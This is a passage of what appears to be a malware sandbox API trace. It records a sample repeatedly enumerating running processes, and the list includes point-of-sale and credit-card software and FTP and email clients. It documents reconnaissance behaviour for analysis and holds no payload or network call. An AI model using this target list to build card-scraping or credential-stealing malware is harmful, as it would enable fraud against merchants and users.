th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0259.337] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0259.339] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0259.344] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0259.346] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0259.347] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0259.349] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0259.359] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0259.361] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0259.362] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x100c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0259.364] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0259.366] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1028, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0259.368] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="likely-final-out.exe")) returned 1 [0259.369] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="local reality bank.exe")) returned 1 [0259.371] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="kitchen-box-instead.exe")) returned 1 [0259.376] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1058, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x9dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.378] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.380] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x127c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.382] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.383] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.385] Process32Next (in: hSnapshot=0x758, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0259.387] CloseHandle (hObject=0x758) returned 1 [0259.387] Sleep (dwMilliseconds=0x64) [0259.596] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0259.643] Process32First (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0259.644] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x79, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0259.646] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0259.647] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.649] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0259.650] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0259.652] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0259.657] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0259.658] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0259.660] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.661] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.663] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0259.664] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.666] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.667] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.688] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.689] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.691] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.692] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.694] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0259.695] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0259.697] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0259.702] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.704] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0259.705] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0259.706] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0259.708] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0259.709] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0259.711] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0259.712] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0259.714] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.715] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0259.719] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="studentbecausedemocratic.exe")) returned 1 [0259.721] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="share.exe")) returned 1 [0259.722] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="myself.exe")) returned 1 [0259.723] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="feel.exe")) returned 1 [0259.725] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="action program citizen.exe")) returned 1 [0259.732] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="reachinvolve.exe")) returned 1 [0259.734] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="question.exe")) returned 1 [0259.735] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="play hit.exe")) returned 1 [0259.737] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mean.exe")) returned 1 [0259.738] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xde0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="evening.exe")) returned 1 [0259.739] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="memory everybody nature.exe")) returned 1 [0259.741] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="structurecausebar.exe")) returned 1 [0259.742] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="good.exe")) returned 1 [0259.744] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="item study safe.exe")) returned 1 [0259.745] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="health-prove-opportunity.exe")) returned 1 [0259.747] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="break.exe")) returned 1 [0259.751] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="minute-budget-themselves.exe")) returned 1 [0259.752] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0259.754] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0259.755] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0259.756] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0259.758] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0259.759] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0259.761] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0259.766] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xea0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0259.768] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0259.769] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0259.771] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0259.773] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0259.775] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: lppe=0x1046fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0259.776] Process32Next (in: hSnapshot=0x17b0, lppe=0x1046fe20 | out: 